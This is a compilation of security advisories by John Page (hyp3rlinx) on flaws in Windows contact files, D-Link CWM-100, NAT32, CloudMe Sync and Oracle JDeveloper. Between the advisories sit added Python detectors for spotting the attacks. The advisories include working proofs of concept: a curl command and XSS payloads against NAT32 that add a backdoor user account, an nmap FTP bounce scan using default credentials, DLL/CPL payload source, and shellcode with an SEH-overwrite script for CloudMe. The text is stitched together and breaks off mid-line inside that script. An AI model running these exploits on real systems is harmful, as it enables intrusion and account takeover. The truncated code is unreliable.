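    for finding in reg_filename_findings(SAMPLE_FILENAME):
        print("-", finding)
```

For the sample filename the model yields the two-line text "Microsoft-Security-Update-v1.2-Windows-10.reg" / "Click Yes" followed by three spaces and a NUL, and nothing of the trailing ".reg", which matches the effect the advisory describes. A gateway rule needs only the detector: any .reg attachment whose name contains "%" followed by a letter, digit or one of the listed sequences is worth blocking outright, since a benign .reg filename has no reason to carry them.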
Microsoft Windows ".contact" File HTML Injection Mailto: Link Remote Code Execution 0day ZDI-CAN-75
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591

[Vendor]
www.microsoft.com

[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista. This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.

[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution

[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files. The E-mail address field takes an expected E-mail address value; however, the .CONTACT file is vulnerable to HTML injection as no validation is performed. Therefore, if an attacker references an executable file using an HREF tag, clicking the link runs that executable without warning instead of performing the expected email behavior. This is dangerous and would be unexpected to an end user.

The E-mail address's Mailto: link will point to an arbitrary executable like:

p...@microsoft.com

Additionally the executable file can live in a sub-directory and be referenced like "p...@microsoft.com", or attackers can use directory traversal techniques to point to malware sitting in the target's Downloads directory like:

p...@microsoft.com

(The HREF markup around the addresses in these three examples was stripped from this copy of the advisory.)

Making matters worse, if the files are compressed and then downloaded, the "mark of the web" (MOTW) may not work as expected with certain archive utilities.

This advisory was initially one of three different vulnerabilities I reported to the Zero Day Initiative Program (ZDI) that Microsoft decided not to release a security fix for and closed. The first cases I reported to ZDI were the .VCF and .CONTACT file Website address input fields. This example is yet another vector affecting Windows .CONTACT files and is being released as the .CONTACT file issue is now publicly known.

[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the E-mail: field

p...@microsoft.com

Windows will prompt you: "The e-mail address you have entered is not a valid internet e-mail address. Do you still want to add this address?" Click Yes.

Open the .CONTACT file and click the Mailto: link. BOOM! Windows Calculator will execute.

Attacker-supplied code is not limited to .EXE, .CPL or .COM, as .VBS files will also execute! :)

[POC Video URL]
https://vimeo.com/312824315

[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected the Website address input fields and was publicly disclosed January 16, 2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
Microsoft Windows VCF File Insufficient UI Warning Remote Code Execution 0day ZDI-CAN-6920
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
A VCF file is a standard file format for storing contact information for a person or business. Microsoft Outlook supports the vCard and vCalendar features. These are a powerful new approach to electronic Personal Data Interchange (PDI).

[Vulnerability Type]
Insufficient UI Warning Remote Code Execution

[CVE Reference]
ZDI-19-013
ZDI-CAN-6920

[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data in a VCard file can cause Windows to display a dangerous hyperlink. The user interface fails to provide any indication of the hazard. An attacker can leverage this vulnerability to execute code in the context of the current user.

[Exploit/POC]
1) Create a directory and name it "http"; this will house the .CPL executable file.

2) Create a .CPL file and give it a website name. I named mine "www.hyp3rlinx.altervista.cpl", or use whatever website you wish, so it can be referenced from the VCF file. A .CPL file is a DLL that Windows executes via the Control Panel handler.

#include <windows.h>
/* hyp3rlinx */
/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/

void ms_vcf_0day(){
    MessageBox(0, "Continue with install?", "TrickyDealC0der :)", MB_YESNO + MB_ICONQUESTION);
}

/* Runs when the .CPL is loaded; the message box stands in for the attacker's payload */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:{ ms_vcf_0day(); break; }
        case DLL_PROCESS_DETACH:{ ms_vcf_0day(); break; }
        case DLL_THREAD_ATTACH:{ ms_vcf_0day(); break; }
        case DLL_THREAD_DETACH:{ ms_vcf_0day(); break; }
    }
    return TRUE;
}

3) Make sure to rename the executable's .DLL extension to .CPL if you did not follow the compile instructions above, which output ".CPL" directly.
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl

4) Create the .VCF file; I named mine "trickyDealC0der.vcf". For the URL property in the .VCF file specify a value like:

URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF file content, "trickyDealC0der.vcf":

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD

Now open the "trickyDealC0der.vcf" file and click the website link. The value is not an absolute URL, so Windows resolves it as a relative path (the trailing dot of the "http." component is ignored) into the "http" directory next to the VCF file, where our CPL executable lives, and KABOOM! :)

[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/

[Network Access]
Remote

[POC Video URL]
https://vimeo.com/310684003

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 - The vendor requested an additional file
10/03/18 - ZDI provided added files and a new PoC
10/03/18 - The vendor advised the report did not meet the bar for service
10/05/18 - ZDI advised that we believe the report is exploitable and notified the vendor of the intent to 0-day on 10/16/18
10/08/18 - The vendor advised ZDI they had re-considered a fix and requested an extension to 01/08/19
10/09/18 - ZDI agreed to the short extension
11/14/18 - The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 - The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that engineering team had decided to pursue the fix as v.Next and Microsoft has decided that it will not be fixing this vulnerability and we are closing this case
12/27/18 - ZDI notified the vendor of the intent to 0-day on 01/07/18
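One scanner for the two contact-file vectors above (the .CONTACT advisory's HTML injected into the e-mail field, and the VCF advisory's scheme-less URL that resolves to a local .CPL), as an added Python 3 example; it is not Microsoft's validation and not the advisories' PoC. It applies the check Windows should have applied: an e-mail field must be a plain mailbox address with no markup, and a website field must be an absolute http(s) URL that does not name an executable. The vCard sample is the one from the VCF advisory; the .contact sample, its element names and the schemas.microsoft.com/Contact namespace are constructed assumptions, and the checks deliberately look at every text node so they do not depend on them.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Extensions the advisories show or name as executed via these links, plus a few common
# ones (assumption); Windows would happily launch more.
EXEC_EXT = (".exe", ".cpl", ".com", ".vbs", ".dll", ".scr", ".bat", ".cmd", ".js", ".hta")
MARKUP_RE = re.compile(r"<\s*[A-Za-z!/]")
EMAIL_RE = re.compile(r"""^[^@\s<>"']+@[^@\s<>"'.]+(\.[^@\s<>"'.]+)+$""")


def email_problem(value):
    """Why an e-mail field is unsafe, or None if it is a plain mailbox address."""
    if MARKUP_RE.search(value):
        return "markup in e-mail field"
    if not EMAIL_RE.match(value.strip()):
        return "not a plain mailbox address"
    return None


def url_problem(value):
    """Why a website field is unsafe, or None if it is an absolute http(s) URL to a non-executable."""
    v = value.strip()
    if MARKUP_RE.search(v):
        return "markup in URL field"
    parts = urlsplit(v)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return "not an absolute http(s) URL (would resolve as a local path)"
    if parts.path.lower().endswith(EXEC_EXT):
        return "points at an executable"
    return None


def scan_vcf(text):
    """(property, value, problem) for every suspicious EMAIL or URL property in a vCard."""
    findings = []
    unfolded = re.sub(r"\r?\n[ \t]", "", text)        # RFC 6350 line folding
    for line in unfolded.splitlines():
        if ":" not in line:
            continue
        head, value = line.split(":", 1)
        prop = head.split(";", 1)[0].strip().upper()  # strip TYPE=/PREF= parameters
        if prop == "EMAIL":
            problem = email_problem(value)
        elif prop == "URL":
            problem = url_problem(value)
        else:
            continue
        if problem:
            findings.append((prop, value, problem))
    return findings


def scan_contact(xml_text):
    """(element, value, problem) for text nodes of a .contact file that carry markup or executable links."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        value = (el.text or "").strip()
        if not value:
            continue
        local = el.tag.rsplit("}", 1)[-1]             # drop the namespace
        if local == "Address":                        # e-mail address element (assumed name)
            problem = email_problem(value)
        elif MARKUP_RE.search(value):
            problem = "markup in %s field" % local
        elif value.lower().endswith(EXEC_EXT):
            problem = "%s field points at an executable" % local
        else:
            problem = None
        if problem:
            findings.append((local, value, problem))
    return findings


# Constructed samples: the vCard from the VCF advisory, and a .contact file whose e-mail
# element carries an injected anchor (element and namespace names are assumptions).
SAMPLE_VCF = r"""BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD
"""

SAMPLE_CONTACT = r"""<?xml version="1.0" encoding="UTF-8"?>
<c:contact c:Version="1" xmlns:c="http://schemas.microsoft.com/Contact">
  <c:EmailAddressCollection>
    <c:EmailAddress c:ElementID="1">
      <c:Address>&lt;a href="..\Downloads\invoice.exe"&gt;someone@example.com&lt;/a&gt;</c:Address>
      <c:Type>SMTP</c:Type>
    </c:EmailAddress>
  </c:EmailAddressCollection>
</c:contact>
"""

if __name__ == "__main__":
    for finding in scan_vcf(SAMPLE_VCF) + scan_contact(SAMPLE_CONTACT):
        print(finding)
```

The URL check is the important one for the VCF case: "http.\\www.hyp3rlinx.altervista.cpl" has no scheme at all, so any validator that merely looks for "http" in the string passes it, while requiring a parsed scheme and host rejects it before the extension is even considered.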
D-LINK Central WifiManager CWM-100 Server Side Request Forgery CVE-2018-15517
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec
***Greetz: indoushka | Eduardo B.***

[Vendor]
us.dlink.com

[Product]
D-LINK Central WifiManager (CWM 100) Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.

[Vulnerability Type]
Server Side Request Forgery

[Affected Component]
MailConnect

[CVE Reference]
CVE-2018-15517

[Security Issue]
Using a web browser or a script, SSRF can be initiated against internal or external systems to conduct port scans by leveraging D-Link's MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check the connection to an SMTP server, but it actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. The endpoint replies "OK" when the connection succeeds, so it doubles as a port scanner. Because the connections originate from the CWM-100 host, this undermines accountability for where a scan or connection actually came from and can bypass firewall rules that trust the appliance. This can be automated with a script or done from a web browser.

[Exploit/POC]
https://VICTIM-IP/index.php/System/MailConnect/host/[host]/port/[port]/secure/
reply: OK

Scan internal port 22 (SSH):
https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/
reply: OK

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned by Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 10'2018."
Request update: October 16, 2018
No reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure
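The MailConnect route above seen from the defender's side, as an added Python 3 example that is not D-Link code: it pulls the target host and port out of web-server access-log request lines and flags the requests that look like SSRF probes rather than a real SMTP connectivity test (a non-SMTP port, or a loopback/private target), and it carries the allow-list check the endpoint should have enforced. The log lines are constructed samples in a common access-log shape; the route template and the "OK" semantics come from the advisory, the assumption that "secure" is an optional trailing segment comes from the advisory's empty "/secure/" examples.

```python
import ipaddress
import re

# The MailConnect route from the advisory, as it appears in an access-log request line.
MAILCONNECT_RE = re.compile(
    r'"(?:GET|POST) /index\.php/System/MailConnect/host/(?P<host>[^/ "]+)'
    r'/port/(?P<port>\d+)/secure/(?P<secure>[^/ "]*)'
)
SMTP_PORTS = {25, 465, 587}


def parse_mailconnect(log_line):
    """Client, target host, port and secure flag of a MailConnect request, or None."""
    m = MAILCONNECT_RE.search(log_line)
    if not m:
        return None
    return {
        "client": log_line.split(" ", 1)[0],
        "host": m.group("host"),
        "port": int(m.group("port")),
        "secure": bool(m.group("secure")),
    }


def is_non_global(host):
    """True for loopback, private, link-local and similar literal addresses.  Hostnames are
    not resolved here, so a name that resolves internally (or rebinds) is not caught."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:
        return False


def probe_reasons(req):
    """Why a MailConnect request looks like an SSRF probe rather than an SMTP test."""
    reasons = []
    if req["port"] not in SMTP_PORTS:
        reasons.append("non-SMTP port %d" % req["port"])
    if is_non_global(req["host"]):
        reasons.append("non-global target %s" % req["host"])
    return reasons


def mailconnect_allowed(host, port):
    """The server-side check the endpoint lacks: SMTP ports only, no internal targets.
    A production fix should also resolve the name and re-check the resulting address."""
    return port in SMTP_PORTS and not is_non_global(host)


def scan_summary(log_lines):
    """client -> [(host, port, reasons)] for every request flagged by probe_reasons."""
    summary = {}
    for line in log_lines:
        req = parse_mailconnect(line)
        if req is None:
            continue
        reasons = probe_reasons(req)
        if reasons:
            summary.setdefault(req["client"], []).append((req["host"], req["port"], reasons))
    return summary


# Constructed sample log: one legitimate SMTP test, three probes, one unrelated request.
SAMPLE_LOG = [
    '10.0.0.5 - admin [08/Aug/2018:10:00:01 -0400] "GET /index.php/System/MailConnect/host/smtp.example.com/port/587/secure/ssl HTTP/1.1" 200 2',
    '10.0.0.5 - admin [08/Aug/2018:10:00:02 -0400] "GET /index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ HTTP/1.1" 200 2',
    '10.0.0.5 - admin [08/Aug/2018:10:00:03 -0400] "GET /index.php/System/MailConnect/host/127.0.0.1/port/3306/secure/ HTTP/1.1" 200 2',
    '10.0.0.5 - admin [08/Aug/2018:10:00:04 -0400] "GET /index.php/System/MailConnect/host/192.168.1.20/port/445/secure/ HTTP/1.1" 200 2',
    '10.0.0.9 - - [08/Aug/2018:10:00:05 -0400] "GET /index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for client, probes in scan_summary(SAMPLE_LOG).items():
        for host, port, reasons in probes:
            print(client, "->", host, port, "; ".join(reasons))
```

The summary groups by client on purpose: a single MailConnect call to an odd port may be a misconfiguration, while one client walking several host:port pairs in a few seconds is the scan pattern the advisory describes, and that is the signal worth alerting on.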
D-LINK Central WifiManager CWM-100 Trojan File SYSTEM Privilege Escalation CVE-2018-15515
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec

***Greetz: indoushka | Eduardo B.***

[Vendor]
us.dlink.com

[Product]
D-LINK Central WifiManager (CWM 100) Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.

[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation

[Affected Component]
"quserex.dll"

[CVE Reference]
CVE-2018-15515

[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity.

[Impact]
Code Execution as SYSTEM

[Exploit/POC]
1) Create a 32bit DLL named "quserex.dll" and place it in the "CaptivelPortal.exe" directory under the DLINK directory
2) Restart the service "CaptivelPortal"
3) Proof: examine using Process Monitor (Sysinternals)

#include <windows.h>

/* hyp3rlinx */
/* gcc -c -m32 quserex.c
   gcc -shared -m32 -o quserex.dll quserex.o */

/* Payload: the loader proves the DLL ran by popping a message box. */
void executo(){
  MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
  switch(fdwReason){
    case DLL_PROCESS_ATTACH:{ executo(); break; }
    case DLL_PROCESS_DETACH:{ executo(); break; }
    case DLL_THREAD_ATTACH:{ executo(); break; }
    case DLL_THREAD_DETACH:{ executo(); break; }
  }
  return TRUE;
}

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure
D-LINK Central WifiManager CWM-100 FTP Server PORT Bounce Scan CVE-2018-15516
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt
[+] ISR: ApparitionSec

***Greetz: indoushka | Eduardo B.***

[Vendor]
us.dlink.com

[Product]
D-LINK Central WifiManager (CWM 100) Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link's free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks.

[Vulnerability Type]
FTP Server PORT Bounce Scan

[CVE Reference]
CVE-2018-15516

[Security Issue]
The FTP Server component of the D-LINK Central WifiManager can be used as a man-in-the-middle machine allowing PORT command bounce scan attacks. This vulnerability allows remote attackers to abuse your network and discreetly conduct network port scanning. Victims will then think these scans are originating from the D-LINK network running the afflicted FTP Server and not you.

[Exploit/POC]
D-LINK CWM-100 FTP Server listens on port 9000 (default); default creds are "admin" "admin".

nmap -v -b admin:admin@VICTIM-IP:9000 -p 21,22,23,53,445

[POC Video URL]
https://vimeo.com/299797225

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: August 8, 2018
Vendor acknowledgement: August 8, 2018
CVE assigned Mitre: August 18, 2018
Request update: August 31, 2018
No reply from vendor
Request update: September 6, 2018
Vendor: "R has begun this month to patch your report." : September 12, 2018
Request update: October 3, 2018
Vendor: "will release a new beta for QA verification by end of this month 10'2018."
Request update: October 16, 2018
no reply from vendor
Request update: October 23, 2018
Vendor: "It still is schedule to be released by the 31st." : October 23, 2018
Inform vendor of disclosure by November 8, 2018 : October 31, 2018
No reply from vendor
November 8, 2018 : Public Disclosure
NAT32 Build (22284) Remote Code Execution CVE-2018-6940 (hyp3rlinx / apparition security)
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt
[+] ISR: Apparition Security
[-_-] D1rty0tis

Vendor:
=================
www.nat32.com

Product:
=================
NAT32 Build (22284)

NAT32 is a versatile IP Router implemented as a WIN32 application.

Vulnerability Type:
=================
Remote Command Execution

CVE Reference:
=================
CVE-2018-6940

Security Issue:
=================
NAT32 listens on Port 8080 for its Web interface.

C:\>netstat -ano | findstr 8080
  TCP    0.0.0.0:8080    0.0.0.0:0    LISTENING    3720

If the 'Password Checking' (BASIC authentication) feature is NOT enabled (the user must select it under the config tab), then remote attackers who can reach NAT32 can potentially execute arbitrary commands. If authentication is enabled they will get an 'Unauthorized' server reply; however, read on ...

e.g. Add user account.

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;"

run start net user D1rty0Tis abc123 /add
Done

If the NAT32 'Password Checking' feature IS enabled, remote attackers can STILL potentially issue arbitrary commands by exploiting a Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link or visit an attacker controlled webpage.

Also worth mentioning: NAT32 implements BASIC authentication, which passes BASE64 encoded credentials that can be easily revealed if sniffed on the network.

When 'Password Checking' is enabled, attackers using Ajax calls via XSS would need to use a combination of '%0D%0A' and double encoding to deal with white-space in order for the payload to stay intact: %25 for the '%' sign followed by 20 (%2520) decodes to %20. Using %20 or %2B will not cut it; however, '%0D%0A' (CRLF) and '%2520' encoding serves us well.

NAT32 has an interesting command, 'EXECR', that can allow attackers to capture the command output response from the server to see right away whether an attack was a success or not.

e.g. Add account and get response (EXECR)

HTTP Response:

The command completed successfully.
execr net user D1rty0Tis abc123 /add
Done

The NAT32 'winroute' command will return host route information.

XSS response e.g.

Destination Mask Nexthop Metric IfIndex Type Proto Age
0.0.0.0 0.0.0.0 192.168.1.210 b4 3 21:41 [min:sec]
127.0.0.0 255.0.0.0 127.0.0.1 306 13 3 22:04 [min:sec]
127.0.0.1 255.255.255.255 127.0.0.1 306 13 3 22:04 [min:sec]
127.255.255.255 255.255.255.255 127.0.0.1 306 13 3 22:04 [min:sec]

Exploit/POC:
=================
NAT32 Password Checking not enabled...

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add;"

NAT32 BASIC authentication enabled, use XSS...

Add backdoor account and capture CMD output using the NAT32 'execr' shell command.

http://x.x.x.x:8080/shell?cmd=var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);

Get Windows Routes (info disclosure):

http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E

Network Access:
=================
Remote

Severity:
=================
High

Disclosure Timeline:
=================
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure
CVE-2018-6892 CloudMe Sync <= v1.10.9 Unauthenticated Remote Buffer Overflow (hyp3rlinx / apparition security)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/CLOUDME-SYNC-UNAUTHENTICATED-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
[+] SSD Beyond Security Submission: https://blogs.securiteam.com/index.php/archives/3669

Vendor:
=================
www.cloudme.com

Product:
=================
CloudMe Sync <= v1.10.9 (CloudMe_1109.exe)
hash: 0e83351dbf86562a70d1999df7674aa0

CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content; all files are synchronized between devices.

Vulnerability Type:
=================
Buffer Overflow

CVE Reference:
=================
CVE-2018-6892

Security Issue:
=================
Unauthenticated remote attackers that can connect to the "CloudMe Sync" client application listening on port , can send a malicious payload causing a Buffer Overflow condition. This will result in an attacker controlling the program's execution flow and allowing arbitrary code execution on the victim's PC.

The CloudMe Sync client creates a socket listening on TCP Port (0x22B8). In Qt5Core:

00564DF1  . C74424 04 B822>  MOV DWORD PTR SS:[ESP+4],22B8
00564DF9  . 890424           MOV DWORD PTR SS:[ESP],EAX
00564DFC  . FF15 B8738100    CALL DWORD PTR DS:[<_ZN10QTc>   ; Qt5Netwo._ZN10QTcpServer6listenERK12QHostAddresst

C:\>netstat -ano | findstr
  TCP    0.0.0.0:    0.0.0.0:0    LISTENING    15504
  TCP    [::]:       [::]:0       LISTENING    15504

Buffer Overflow:
EIP register will be overwritten at about 1075 bytes.

EAX 0001
ECX 76F698DA msvcrt.76F698DA
EDX 0035
EBX 41414141
ESP 0028D470
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

Stack Dump:
=================
(508.524): Access violation - code c005 (first/second chance not available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll -
eax= ebx= ecx=41414141 edx=778f353d esi= edi=
eip=41414141 esp=00091474 ebp=00091494 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???

Exploitation is very easy as ASLR and SafeSEH are all set to false, making the exploit portable and able to work across different operating systems. We will therefore use a Structured Exception Handler overwrite for our exploit.

e.g.

6FE6909D  0x6fe6909d : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [libstdc++-6.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\libstdc++-6.dll)
00476795  0x00476795 : pop ebx # pop esi # ret 0x20 | startnull {PAGE_EXECUTE_READ} [CloudMe.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\CloudMe.exe)
61E7B7F6  0x61e7b7f6 : pop ebx # pop esi # ret 0x20 | {PAGE_EXECUTE_READ} [Qt5Gui.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.9.0.0 (C:\Users\victimo\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll)

0day Exploit POC:
=================

import socket,struct

print 'CloudMe Sync v1.10.9'
print 'Unauthenticated Remote Buffer Overflow 0day'
print 'Discovery/credits: hyp3rlinx'
print 'apparition security\n'

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

ip=raw_input('[+] CloudMe Target IP> ')

nseh="\xEB\x06"+"\x90"*2 #JMP
seh=struct.pack('
Oracle JDeveloper IDE Directory Traversal CVE-2017-10273 (hyp3rlinx / apparition security)
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-JDEVELOPER-DIRECTORY-TRAVERSAL.txt
[+] ISR: apparition security

Vendor:
=================
www.oracle.com

Product:
=================
JDeveloper IDE

Oracle JDeveloper is a free integrated development environment that simplifies the development of Java-based applications, addressing every step of the application lifecycle.

Vulnerability Type:
=================
Directory Traversal

CVE Reference:
=================
CVE-2017-10273

Security Issue:
=================
Attackers can place malicious files outside intended target directories if a user is tricked into importing corrupt .WAR or .EAR archives. Later, attackers can potentially request these scripts/files to execute system commands on the affected target.

